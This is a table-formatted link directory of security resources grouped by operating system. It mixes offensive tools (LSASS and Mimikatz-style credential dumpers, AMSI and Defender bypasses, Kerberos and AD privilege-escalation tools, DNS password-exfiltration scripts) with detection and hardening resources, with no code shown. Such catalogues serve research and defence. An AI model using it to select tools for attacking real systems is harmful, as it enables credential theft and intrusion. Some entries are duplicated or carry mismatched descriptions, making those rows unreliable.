| MitigationFlagsCliTool | 44 | about 4 years ago | : Prints mitigation policy information for processes in a dump file |
| Windows 10 System Programming book samples | 408 | 6 months ago | , |
| DriverMon | 328 | about 4 years ago | : Monitor activity of any driver |
| Windows AllTools | 1,161 | 3 months ago | : All reasonably stable tools |
| Sysmon Internals | : From File Delete Event to Kernel Code Execution | ||
| Windows-driver-samples | 6,993 | 18 days ago | : This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples |
| procfilter | 397 | almost 5 years ago | : A YARA-integrated process denial framework for Windows |
| Winerror | 7 | about 4 years ago | : Get Windows Programming error codes descriptions using the command line |
| ProcessHacker | 11,043 | 7 days ago | : The Minimalistic x86/x64 API Hooking Library for Windows |
| PVE CA Cert List Utility | : Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates | ||
| Release the Kraken: Fileless injection into Windows Error Reporting service | |||
| MinHook | 4,406 | 4 months ago | : The Minimalistic x86/x64 API Hooking Library for Windows |
| Windows security baselines | |||
| TokenPlayer | 267 | almost 4 years ago | : Manipulating and Abusing Windows Access Tokens |
| The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment | |||
| ntlmscan | 346 | 5 months ago | : scan for NTLM directories |
| Smbtouch-Scanner | 140 | over 3 years ago | : Automatically scan the inner network to detect whether they are vulnerable |
| Block process creations originating from PSExec and WMI commands | |||
| VDM | :Vulnerable Driver Manipulation. : A collection of various vulnerable (mostly physical memory exposing) drivers | ||
| HppDLL | 1 | about 4 years ago | Source code for : local password dumping using MsvpPasswordValidate hooks |
| SharpMapExec | 653 | about 3 years ago | : A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements |
| Fibratus | 2,209 | 8 days ago | : A modern tool for the Windows kernel exploration and observability |
| Ultimate WDAC Bypass List | 482 | 7 months ago | : A centralized resource for previously documented WDAC bypass techniques |
| Live Patching Windows API Calls Using PowerShell | |||
| fibratus | : A modern tool for the Windows kernel exploration and observability | ||
| Adventures in Dynamic Evasion | |||
| Windows-Insight | 150 | over 4 years ago | : The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies |
| Fully working SMB protocol implementation in webassembly | |||
| Parent Process vs. Creator Process | |||
| WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) | IS USED BY BITTER APT IN TARGETED ATTACK | ||
| ntvdmx64 | 819 | 18 days ago | : Run Microsoft Windows NTVDM (DOS) on 64bit Editions |
| Spectre exploits in the "wild" | |||
| RegRipper | 557 | 20 days ago | |
| Security rapid modernization plan | |||
| Windows & Active Directory Exploitation Cheat Sheet and Command Reference | |||
| Finding writable folders and hijackable DLLs | |||
| OffensiveCSharp | 1,381 | almost 2 years ago | : Collection of Offensive C# Tooling |
| Hyper-V internals researches | 661 | 2 months ago | : Internals information about Hyper-V |
| Do You Really Know About LSA Protection (RunAsPPL)? | . : Dump the memory of a PPL with a userland exploit | ||
| fibratus | 2,209 | 8 days ago | : A modern tool for the Windows kernel exploration and tracing |
| MSTSC Packet Dump Utility | 27 | almost 3 years ago | : The mstscdump utility allows unencrypted RDP packets being sent or received by MSTSC.EXE (or any other application that loads MSTSCAX.DLL) to be captured into a PCAP file for later analysis in various tools such as Microsoft Message Analyzer, Microsoft Network Monitor, or WireShark. It also demonstrates how to hook into the ActiveX interfaces exposed by MSTSCAX.DLL |
| How to bypass Defender in a few easy steps | |||
| Running NetworkMiner in Windows Sandbox | |||
| Windows Desktop | 14 | almost 4 years ago | : History and analysis of Windows desktop images |
| A collection of tools to interact with Microsoft Security Response Center API | 95 | 11 months ago | |
| GetTempPathW function | |||
| No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders | |||
| Human-operated ransomware | : Human-operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry | ||
| Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft | |||
| Microsoft Security Best Practices | |||
| No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders | |||
| Awesome Windows Domain Hardening | 1,749 | almost 5 years ago | : A curated list of awesome Security Hardening techniques for Windows |
| Event Log Explorer™ for Windows event log analysis | |||
| Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory | |||
| EVERYONE GETS A ROOTKIT | : Eclypsium Researchers Identify Weakness in Microsoft WPBT Impacting All Windows-based Devices Since Windows 8 | ||
| Six Facts about Address Space Layout Randomization on Windows | |||
| How to bypass Defender in a few easy steps | |||
| whids | 1,151 | over 1 year ago | : Open Source EDR for Windows |
| Backdoor .NET assemblies with… dnSpy | |||
| Windows-auditing-mindmap | 1,044 | 3 months ago | : Set of Mindmaps providing a detailed overview of the different #Windows auditing capacities and event log files |
| If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session. | |||
| Here are a few tool resources for using WinRM w/o PowerShell | |||
CSIRT / Operating Systems / Windows / Here are a few tool resources for using WinRM w/o PowerShell | |||
| winrs | |||
| Scripting in Windows Remote Management | |||
| CSharpWinRM | 161 | about 4 years ago | :.NET 4.0 WinRM API Command Execution |
| WinRMDLL | 140 | about 3 years ago | : C++ WinRM API via Reflective DLL |
| WSMan-WinRM | 222 | over 4 years ago | : A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object |
| pywinrm | : is a Python client for the Windows Remote Management (WinRM) service. It allows you to invoke commands on target Windows machines from any machine that can run Python | ||
| Abusing Windows Remote Management (WinRM) with Metasploit | |||
CSIRT / Operating Systems / Windows | |||
| LACheck | 83 | about 3 years ago | : Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration |
| awesome_windows_logical_bugs | 567 | 5 months ago | : collect for learning cases |
| Attacking RDP from Inside | : How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more | ||
| Dynamic Invocation in .NET to bypass hooks | |||
| LowBox Token Permissive Learning Mode | |||
| DInjector | : Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL | ||
| SMB-Session-Spoofing | 118 | about 1 year ago | : The goal of this program is to create a fake SMB Session |
| Windows Kernel Introspection (WKI) | |||
| MSSQL Analysis Services - Coerced Authentication | 124 | about 1 year ago | : A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine |
| Reinschauer | 506 | almost 2 years ago | : A PoC to remotely control Windows machines over Websockets |
| Lsass Shtinkering | 377 | almost 2 years ago | : New method of dumping LSASS by abusing the Windows Error Reporting service. It sends a message to the service with the ALPC protocol to report an exception on LSASS. This report will cause the service to dump the memory of LSASS |
| Windows Persistence Techniques | |||
| Windows XP / Windows Server 2003 VLK key generator | 878 | 12 months ago | |
| Banshee | 493 | 8 months ago | : Experimental Windows x64 Kernel Driver/Rootkit |
| New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections | |||
| Active Directory Control Paths | 654 | almost 4 years ago | |
| Gaining Domain Admin from Outside Active Directory | , using (LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay) | ||
| Invoke-ADLabDeployer | 479 | almost 6 years ago | : Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams |
| PowerShellClassLab | 41 | over 6 years ago | : This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server |
| ADImporter | 69 | over 6 years ago | |
| Low Privilege Active Directory Enumeration from a non-Domain Joined Host | |||
| Active Directory as a C2 | |||
| Escalating privileges with ACLs in Active Directory | |||
| Active Directory Kill Chain Attack & Defense | 4,421 | 16 days ago | : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity |
| #TR19 Active Directory Security Track | |||
| Penetration Testing Active Directory, Part I | : I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD | ||
| Penetration Testing Active Directory, Part II | : For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation | ||
| Wagging the Dog | : Abusing Resource-Based Constrained Delegation to Attack Active Directory | ||
| Exploiting PrivExchange | : The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host | ||
CSIRT / Operating Systems / Windows / BloodHound: | |||
| BloodHound | 9,893 | 5 months ago | : Six Degrees of Domain Admin, and a based ingestor for BloodHound |
| BloodHound Database Creator | 377 | 5 months ago | : This python script will generate a randomized data set for testing BloodHound features and analysis |
| Case Study: Password Analysis with BloodHound | |||
| Introducing BloodHound 4.0: The Azure Update | |||
| SharpHound3 | 520 | over 2 years ago | |
| ATTACK MAPPING WITH BLOODHOUND | |||
| aclpwn.py | 702 | about 3 years ago | : Active Directory ACL exploitation with BloodHound |
| BloodHound.py | 1,940 | 4 months ago | : A Python based ingestor for BloodHound |
| BloodHound-Tools | 440 | about 2 years ago | : Collection of tools that reflect the network dimension into Bloodhound's data |
CSIRT / Operating Systems / Windows | |||
| Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) | : | ||
CSIRT / Operating Systems / Windows / Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) | |||
| Pass the Certificate | |||
| UnPAC the hash | |||
| Shadow Credentials | |||
| Certificate Services (AD-CS) | |||
| Certificate templates | |||
| CA configuration | |||
| Access controls | |||
| Web endpoints | |||
CSIRT / Operating Systems / Windows / Kerberos: | |||
| Using Kerberos for Authentication Relay Attacks | |||
| Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) | |||
| Kerberos Resource-Based Constrained Delegation | : When an Image Change Leads to a Privilege Escalation | ||
| New-KrbtgtKeys.ps1 | 406 | 9 months ago | : This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation |
| Kerberos cheatsheet | : A cheatsheet with commands that can be used to perform kerberos attacks | ||
CSIRT / Operating Systems / Windows | |||
| Bypassing AD account lockout for a compromised account | |||
| Azure AD and ADFS best practices | : Defending against password spray attacks | ||
| NetNTLMtoSilverTicket | 763 | over 3 years ago | : SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket |
| Domain Goodness | – How I Learned to LOVE AD Explorer | ||
| windapsearch | 799 | over 2 years ago | : Python script to enumerate users, groups and computers from a Windows domain through LDAP queries |
| LDAP Ping and Determining Your Machine’s Site | |||
| Non-Admin NTLM Relaying & ETERNALBLUE Exploitation | |||
| Active Directory administrative tier model | |||
| Exchange-AD-Privesc | 728 | over 1 year ago | : Exchange privilege escalations to Active Directory |
| Hunting for reconnaissance activities using LDAP search filters | |||
| Faking an AD account password change is possible , but detectable. | |||
| Building Free Active Directory Lab in Azure | Ethical Hacking Lessons — | ||
| Configure the log analytics wizard | |||
| Reset the krbtgt account password/keys | |||
| GetNPUsers & Kerberos Pre-Auth Explained | |||
| WinPwn | 3,336 | 10 months ago | : Automation for internal Windows Penetrationtest / AD-Security |
| BadBlood | 2,047 | over 1 year ago | by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active… |
| Vulnerable-AD | 2,010 | 7 months ago | : Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab |
| EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE | |||
| Active-Directory-Exploitation-Cheat-Sheet | 5,669 | about 2 months ago | : A cheat sheet that contains common enumeration and attack methods for Windows Active Directory |
| Active Directory Lab Setup Tool | . : Active Directory Lab for Penetration Testing | ||
| Rubeus | 4,135 | 2 months ago | : is a C# toolset for raw Kerberos interaction and abuses |
| Enabling Active Directory DNS query logging | |||
| SharpMapExec | 653 | about 3 years ago | : This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements |
| Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range | |||
| ADTimeline | 475 | 7 days ago | : Timeline of Active Directory changes with replication metadata |
| Still Passing the Hash 15 Years Later | |||
| Azure-Sentinel | 4,607 | 7 days ago | : Cloud-native SIEM for intelligent security analytics for your entire enterprise |
| Detecting Abuse of Authentication Mechanisms | |||
| Detecting the Elusive: Active Directory Threat Hunting | |||
| Exporting AD FS certificates revisited: Tactics, Techniques and Procedures | |||
| GPO Abuse: “You can’t see me” | |||
| SERVER (UN)TRUST ACCOUNT | : Active Directory persistence through userAccountControl manipulation | ||
| Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability | |||
| DSInternals | 1,654 | about 2 months ago | : Directory Services Internals (DSInternals) PowerShell Module and Framework |
| Certipy | 2,418 | 3 months ago | is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS) |
| Cobalt strike MANUALS_V2 | 94 | about 1 month ago | Increasing privileges and collecting information |
| Active Directory (Attack & Defense ) | |||
| Your Azure AD Connect server ... it's a Tier 0 asset | |||
| Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump | |||
| AADInternals | 1,302 | 10 days ago | : PowerShell module for administering Azure AD and Office 365 |
| From Zero to Domain Admin | |||
| Attacking Active Directory: 0 to 0.9 | |||
| Offensive WMI - Active Directory Enumeration | Part , , and | ||
| BloodyAD | 1,238 | 18 days ago | is an Active Directory Privilege Escalation Framework |
| SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted | |||
| KrbRelayUp | 1,529 | over 2 years ago | : a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings) |
| Harvesting Active Directory credentials via HTTP Request Smuggling | |||
| Ping Castle Cloud | 145 | over 1 year ago | : Audit program for AzureAD |
| Protection of privileged users and groups by Azure AD Restricted Management Administrative Units | |||
| Active Directory Kill Chain Attack & Defense | 4,421 | 16 days ago | : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity |
| A little tool to play with Windows security | 19,466 | 5 months ago | |
| Preventing Mimikatz Attacks – Blue Team – Medium | |||
| pypykatz | 2,879 | about 1 month ago | : Mimikatz implementation in pure Python |
| Walk-through Mimikatz sekurlsa module | |||
| Mimikatz: Mitigando ataques de roubo de credenciais | (pt-br) | ||
| PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ | |||
| SharpKatz | 974 | about 3 years ago | : Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands |
| Protecting RDP Passwords from Mimikatz Using Remote Credential Guard | |||
| Updating Mimikatz in Metasploit | |||
| Capturing Credentials with mimikatz | |||
| Dumping User Passwords from Windows Memory with Mimikatz | |||
| HandleKatz | 573 | about 2 years ago | : PIC lsass dumper using cloned handles |
| CredentialDumping without Mimikatz | |||
| Dumping Lsass Without Mimikatz | |||
| PowerShell Gallery | |||
| PowerShell Scripts | 443 | almost 7 years ago | : Collection of PowerShell scripts |
| Example of Malicious DLL Injected in PowerShell | |||
| POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1 | |||
| Empire | 4,258 | 11 days ago | : Empire is a PowerShell and Python 3.x post-exploitation framework |
| Invisi-Shell | 1,105 | over 5 years ago | : Hide your Powershell script in plain sight. Bypass all Powershell security features |
| DevSec Defense | How DevOps Practices Can Drive Detection Development For Defenders | ||
| Chimera | 1,424 | about 3 years ago | : is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions |
| Geeking out with UEFI, again | |||
| PrivescCheck | 2,976 | 11 days ago | : Privilege Escalation Enumeration Script for Windows |
| Stracciatella | 503 | about 2 years ago | : OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup |
| Invoke-PSImage | 2,162 | about 5 years ago | : Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute |
| Invoke-TheHash | 1,480 | almost 6 years ago | : powerShell Pass The Hash Utils |
| DeepBlueCLI | 2,190 | about 1 year ago | : DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs |
| PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection | |||
| CheeseTools | 691 | over 3 years ago | : Self-developed tools for Lateral Movement/Code Execution |
| Random | 260 | 3 months ago | : a lot of powershell scripts |
| CredPhish | 285 | over 3 years ago | : is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS |
| PowerShell Obfuscation | |||
| powercat | 2,147 | 9 months ago | : netshell features all in version 2 powershell |
| PSByPassCLM | 375 | almost 3 years ago | : Bypass for PowerShell Constrained Language Mode |
| Basic PowerShell for Pentesters | |||
| Invoke-CradleCrafter | 822 | over 6 years ago | : PowerShell Remote Download Cradle Generator & Obfuscator |
| LDAP Monitor | 839 | 5 months ago | : Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration! |
| Understanding and Bypassing AMSI | |||
| Exploring PowerShell AMSI and Logging Evasion | |||
| AMSI.fail | : generates obfuscated PowerShell snippets that break or disable AMSI for the current process | ||
| INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES | |||
| PSBits | 3,207 | 9 days ago | : Simple (relatively) things allowing you to dig a bit deeper than usual |
| Evading Detection: A Beginner's Guide to Obfuscation | 1,010 | 6 months ago | |
| comsvcs MiniDump examples | |||
| Beginning PowerShell Empire - Packet Analysis | |||
| Detailed properties in the Office 365 audit log | |||
| Office 365 Mail Forwarding Rules (and other Mail Rules too) | |||
| Application Guard for Office (public preview) for admins | 957 | 4 days ago | |
| o365spray | 771 | 17 days ago | : Username enumeration and password spraying tool aimed at Microsoft O365 |
| AdminSubmissionsAPI scripts for URL and mail submission. | 10 | over 3 years ago | Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers |
| Commentator | 49 | about 7 years ago | : Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m) |
| Exploiting MFA Inconsistencies on Microsoft Services | . : A tool for checking if MFA is enabled on multiple Microsoft Services | ||
| msoffcrypto-tool | 556 | 4 months ago | : Python tool and library for decrypting MS Office files with passwords or other keys |
| pyxlsb2 | 19 | over 2 years ago | : an Excel 2007+ Binary Workbook (xlsb) parser for Python |
| Making Clouds Rain :: Remote Code Execution in Microsoft Office 365 | |||
| The worst of the two worlds: Excel meets Outlook | |||
| Go365 | 621 | 8 months ago | : An Office365 User Attack Tool |
| Microsoft-365-Defender-Hunting-Queries | 1,937 | almost 3 years ago | : Sample queries for Advanced hunting in Microsoft 365 Defender |
| m365_groups_enum | 52 | over 3 years ago | : Enumerate Microsoft 365 Groups in a tenant with their metadata |
| How to hunt for LDAP reconnaissance within M365 Defender? | |||
| Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs | |||
| Reproducing The ProxyShell Pwn2Own Exploit | |||
| ProxyLogon is Just the Tip of the Iceberg | : A Surface on Microsoft Exchange Server! | ||
| PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER | |||
| How Default Permissions on Microsoft Power Apps Exposed Millions | |||
| Excel Recipe: Some VBA Code with a Touch of Excel4 Macro | |||
| An XML-Obfuscated Office Document (CVE-2021-40444) | |||
| Simple Analysis Of A CVE-2021-40444 .docx Document | |||
| cli-microsoft365 | 926 | 7 days ago | : Manage Microsoft 365 and SharePoint Framework projects on any platform |
| There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive. | |||
| Advanced hunting queries for Microsoft 365 Defender | 1,937 | almost 3 years ago | : Sample queries for Advanced hunting in Microsoft 365 Defender |
| All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646) | |||
| MSSpray | 149 | almost 2 years ago | is used to conduct password spray attacks against Azure AD as well as validate the implementation of MFA on Azure and Office 365 endpoints |
| Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows | 169 | 3 months ago | |
| SnaffPoint | 239 | about 2 years ago | : A tool for pointesters to find candies in SharePoint |
CSIRT / Operating Systems / macOS/iOS | |||
| Apple Open Source | and : security mirror | ||
| Assembly | 559 | over 6 years ago | An iOS App In |
| Having fun with macOS 1days | 121 | over 6 years ago | |
| x18-leak | 83 | over 6 years ago | : iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation |
| EmPyre | 867 | about 7 years ago | : A post-exploitation OS X/Linux agent written in Python 2.7 |
| Apple Lightning (cont.) - serial number reading | Kanzi: It's a cable that's used by Apple's own engineers to debug various hardware (mainly iOS-devices, of course) with SWD (Serial Wire Debug - JTAG for ARM cores) - . : Set of tools to interact with various aspects of Kanzi probe and its derivatives | ||
| SDQAnalyzer | 200 | 12 months ago | : a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol |
| Inside Code Signing | |||
| jelbrekTime | 223 | about 6 years ago | : An developer jailbreak for Apple watch S3 watchOS 4.1 |
| Disabling MacOS SIP via a VirtualBox kext Vulnerability | |||
| mOSL | 225 | almost 4 years ago | : Bash script to audit and fix macOS High Sierra (10.13.x) security settings |
CSIRT / Operating Systems / macOS/iOS / Objective-See: | |||
| DoNotDisturb | 294 | almost 4 years ago | : Detect Evil Maid Attacks |
| sniffMK | 215 | almost 4 years ago | : sniff mouse and keyboard events |
| Remote Mac Exploitation Via Custom URL Schemes | |||
| The Mac Malware of 2018 | |||
CSIRT / Operating Systems / macOS/iOS | |||
| KisMac2 | 901 | about 6 years ago | : KisMAC is a free, open source wireless stumbling and security tool for Mac OS X |
| osx-security-awesome | 734 | 11 months ago | : A collection of OSX and iOS security resources |
| threadexec | 80 | over 6 years ago | : A library to execute code in the context of other processes on iOS 11 |
| Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage | |||
| iOS12 Kernelcache Laundering | |||
| kernelcache-laundering | 60 | about 6 years ago | : load iOS12 kernelcaches and PAC code in IDA |
| Armor | 279 | about 1 year ago | : is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners |
| inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c | |||
| opendrop | 8,709 | 5 months ago | : An open Apple AirDrop implementation written in Python |
| A sample of the iOS malware | sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560 | ||
| ipwndfu | 7,094 | 9 months ago | : open-source jailbreaking tool for older iOS devices |
| Pair Locking your iPhone with Configurator 2 | |||
| KTRW | : The journey to build a debuggable iPhone | ||
| Privilege Escalation | macOS Malware & The Path to Root Part 2 | . : Random scripts for use in the Jamf Pro | ||
| Dylib Hijacking | MacOS Red Teaming 211: | ||
| iOS Application Injection | : Having been interested jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected | ||
| The Mac Malware of 2019 👾 | : a comprehensive analysis of the year's new malware | ||
| OSX.EvilQuest Uncovered | |||
| Low-Level Process Hunting on macOS | |||
| CVE-2020–9934: Bypassing TCC | ...for unauthorized access to sensitive user data! | ||
| Attack Secure Boot of SEP | windknown@pangu | ||
| Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities | 402 | over 3 years ago | |
| Sinter | : New user-mode security enforcement for macOS | ||
| Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection | |||
| macOS-Fortress | 422 | almost 3 years ago | : Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav) |
| From zero to tfp0 - Part 1: Prologue | |||
| From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit | |||
| We Hacked Apple for 3 Months: Here’s What We Found | , | ||
| MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS | |||
| NetworkSniffer | 122 | over 1 year ago | : Log iOS network traffic without a proxy |
| IPv6 security | |||
| OpenHaystack | 8,572 | 5 months ago | : Build your own 'AirTags' label today! Framework for tracking personal Bluetooth devices via Apple's massive Find My network |
| All Your Macs Are Belong To Us | : bypassing macOS's file quarantine, gatekeeper, and notarization requirements | ||
| macOS Security Compliance Project | , | ||
| Introducing | : macOS Initial Access Payload Generator | ||
| Mythic-Macro-Generator | 44 | over 3 years ago | |
| macOSTools | 261 | about 1 year ago | : macOS Offensive Tools |
| TrueTree | 245 | 3 months ago | : A command line tool for pstree-like output on macOS with additional pid capturing capabilities |
| Zero-Day TCC bypass discovered in XCSSET malware | |||
| Dissecting the Apple M1 GPU, part I | and | ||
| macos_shell_memory | 79 | over 3 years ago | : Execute MachO binaries in memory using CGo |
| pwn-my | 647 | about 3 years ago | : iOS 14.5 WebKit/Safari based Jailbreak |
| M1RACLES | : M1ssing Register Access Controls Leak EL0 State. CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip | ||
| Vulnerability Spotlight: A deep dive into macOS SMB server | |||
| How to Use Kerberos on macOS | |||
| Bypassing macOS TCC User Privacy Protections By Accident and Design | |||
| Anecdotes About the macOS Sandbox File Limit | |||
| SSD Advisory – macOS Finder RCE | : Find out how a vulnerability in macOS Finder system allows remote attackers to trick users into running arbitrary commands | ||
| How malware gets into the App Store and why Apple can't stop that | |||
| Quick Analysis for the SSID Format String Bug | |||
| De Rebus Antiquis | : This article aims to explain how to exploit the recursive stack overflow bug in the iOS 7 bootchain. , , -> , iOS | ||
| AirTag Scripts & Resources | 150 | 5 months ago | : AirTag instrumentation including AirTechno and firmware downgrades |
| Pegasus ID | : After extensive research and understanding of how Pegasus Spyware is operating inside of iOS and AndroidOS systems I have created tools that will be able to identify & validate the presence of the spyware on your mobile devices, and tablets. Initial detection points were derived from the mvt-project | ||
| UTM | : Securely run operating systems on your Mac | ||
| qemu-t8030 | 1,998 | about 2 years ago | : iPhone 11 emulated on QEMU |
| Dissecting TriangleDB, a Triangulation spyware implant | |||
| kfd | 874 | 10 months ago | : short for kernel file descriptor, is a project to read and write kernel memory on Apple devices. Attacks: |
CSIRT / Mobile | |||
| Today I make public ALL recordings and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020! | |||
CSIRT / Mobile / Android | |||
| android-security-awesome | 8,213 | 3 months ago | : A collection of android security related resources |
| tip toeing past android 7’s network security configuration | |||
| A Story About Three Bluetooth Vulnerabilities in Android | |||
| Creating an Android Open Source Research Device on Your PC | |||
| Droidefense | 473 | almost 2 years ago | : Advance Android Malware Analysis Framework |
| android-device-check | 83 | about 5 years ago | : Check Android device security settings |
| Project Zero | : OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB | ||
| I'm looking at a Huawei P20 from China, let see what can I found | |||
| Tracking down the developer of Android adware affecting millions of users | |||
| CLI tool to analyze APKs | 41 | 8 months ago | |
| Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot | |||
| TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices | 166 | over 4 years ago | |
| Exploiting Android Messengers with WebRTC: Part 3 | |||
| setools-android | 249 | about 7 years ago | : Unofficial port of setools to Android with additional sepolicy-inject utility included |
| Security Guidelines | : OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data | ||
| Proxying Android app traffic – Common issues / checklist | |||
| Magisk | 48,721 | 12 days ago | : is a suite of open source software for customizing Android, supporting devices higher than Android 5.0 |
| Magisk Trust User Certs | 1,770 | about 1 year ago | : A Magisk module that automatically adds user certificates to the system root CA store |
| MagiskFrida | 949 | 8 days ago | : Run frida-server on boot with Magisk, always up-to-date |
| Android-PIN-Bruteforce | 4,055 | about 1 year ago | : Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb) |
| Mobile Threat Catalogue | 143 | about 1 year ago | : NIST/NCCoE Mobile Threat Catalogue |
| CiLocks | 2,313 | 8 months ago | : Crack Interface lockscreen, Metasploit and More Android/IOS Hacking |
| mvt | 10,416 | 22 days ago | : MVT is a forensic tool to look for signs of infection in smartphone devices |
| Oscorp evolves into UBEL: an advanced Android malware spreading across the globe | |||
| Android Application Penetration Testing Checklist | |||
| 50 secrets codes on Android | |||
| MobSecco | 77 | over 1 year ago | : Cloning apk for bypassing code tampering detection, Google Safety Net and scanning vulnerable plugins |
CSIRT / Mobile / Linux/ *Nix | |||
| BCC | 20,577 | 8 days ago | : Tools for BPF-based Linux IO analysis, networking, monitoring, and more |
| OpenSnitch is a GNU/Linux port of the Little Snitch application firewall | 10,932 | 16 days ago | |
| Security Onion | 3,077 | over 3 years ago | :Linux distro for IDS, NSM, and Log Management |
| Linux Kernel Defence Map | 1,777 | 5 months ago | |
| wcc | 1,851 | about 1 month ago | : The Witchcraft Compiler Collection |
| Ground Zero: Reverse Engineering | : | ||
CSIRT / Mobile / Linux/ *Nix / Ground Zero: Reverse Engineering | |||
| Password Protected Reverse Shells – Linux x64 | Part 1-2: | ||
CSIRT / Mobile / Linux/ *Nix / Ground Zero: Reverse Engineering / Active Directory Dojo: | |||
| Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh | |||
